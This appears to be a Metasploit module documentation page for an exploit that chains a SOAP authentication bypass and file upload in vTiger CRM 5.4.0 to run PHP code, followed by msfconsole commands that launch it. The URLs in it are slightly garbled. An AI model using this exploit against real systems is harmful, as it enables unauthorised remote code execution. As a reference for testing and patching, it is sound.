# This module requires Metasploit: http//metasploitcom/download
# Current source: githubcom/rapid7/metasploit-framework
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
vTiger CRM allows a user to bypass authentication when requesting SOAP services.
In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
service. By combining both vulnerabilities an attacker can upload and execute PHP
code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
10.04 and Windows 2003 SP2.
msf > use exploit/multi/http/vtiger_soap_upload
msf exploit(vtiger_soap_upload) > show targets
msf exploit(vtiger_soap_upload) > set TARGET <target-id>
msf exploit(vtiger_soap_upload) > show options
...show and set options...
msf exploit(vtiger_soap_upload) > exploit